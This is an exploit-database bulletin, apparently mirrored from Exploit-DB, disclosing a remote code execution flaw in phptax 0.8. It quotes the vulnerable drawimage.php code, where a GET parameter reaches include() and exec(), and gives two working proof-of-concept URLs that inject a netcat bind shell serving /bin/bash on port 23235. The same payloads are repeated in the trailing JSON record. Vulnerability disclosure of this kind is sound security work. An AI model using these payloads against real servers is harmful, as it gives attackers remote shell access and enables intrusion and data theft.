Search...

phptax 0.8 - Remote Code Execution Vulnerability

2012-10-02T00:00:00

ID EDB-ID:21665
Type exploitdb
Reporter Jean Pascal Pereira
Modified 2012-10-02T00:00:00

Description

phptax 0.8 - Remote Code Execution Vulnerability. Webapps exploit for php platform

                                        
                                            -----------------------------------------------------
phptax 0.8 &lt;= Remote Code Execution Vulnerability
-----------------------------------------------------

Discovered by: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;

Vendor information:

"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."

Vendor URI: http://sourceforge.net/projects/phptax/

----------------------------------------------------

Risk-level: High

The application is prone to a remote code execution vulnerability.

----------------------------------------------------

drawimage.php, line 63:

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

----------------------------------------------------

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

----------------------------------------------------

Solution:

Do some input validation.

----------------------------------------------------

JSON Vulners Source

Initial Source

{"id": "EDB-ID:21665", "hash": "95d0044974ac777064e9896fb29ee7b1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phptax 0.8 - Remote Code Execution Vulnerability", "description": "phptax 0.8 - Remote Code Execution Vulnerability. Webapps exploit for php platform", "published": "2012-10-02T00:00:00", "modified": "2012-10-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/21665/", "reporter": "Jean Pascal Pereira", "references": [], "cvelist": [], "lastseen": "2016-02-02T16:59:43", "history": [], "viewCount": 38, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-02T16:59:43"}, "dependencies": {"references": [], "modified": "2016-02-02T16:59:43"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/21665/", "sourceData": "-----------------------------------------------------\r\nphptax 0.8 <= Remote Code Execution Vulnerability\r\n-----------------------------------------------------\r\n\r\nDiscovered by: Jean Pascal Pereira <pereira@secbiz.de>\r\n\r\nVendor information:\r\n\r\n\"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.\r\nThe program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot.\"\r\n\r\nVendor URI: http://sourceforge.net/projects/phptax/\r\n\r\n----------------------------------------------------\r\n\r\nRisk-level: High\r\n\r\nThe application is prone to a remote code execution vulnerability.\r\n\r\n----------------------------------------------------\r\n\r\ndrawimage.php, line 63:\r\n\r\ninclude (\"./files/$_GET[pfilez]\");\r\n\r\n// makes a png image\r\n$pfilef=str_replace(\".tob\",\".png\",$_GET[pfilez]);\r\n$pfilep=str_replace(\".tob\",\".pdf\",$_GET[pfilez]);\r\nHeader(\"Content-type: image/png\");\r\nif ($_GET[pdf] == \"\") Imagepng($image);\r\nif ($_GET[pdf] == \"make\") Imagepng($image,\"./data/pdf/$pfilef\");\r\nif ($_GET[pdf] == \"make\") exec(\"convert ./data/pdf/$pfilef ./data/pdf/$pfilep\");\r\n\r\n----------------------------------------------------\r\n\r\nExploit / Proof of Concept:\r\n\r\nBindshell on port 23235 using netcat:\r\n\r\nhttp://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make\r\n\r\n** Exploit-DB Verified:**\r\nhttp://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make\r\n\r\n----------------------------------------------------\r\n\r\nSolution:\r\n\r\nDo some input validation.\r\n\r\n----------------------------------------------------\r\n", "osvdbidlist": ["86992"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}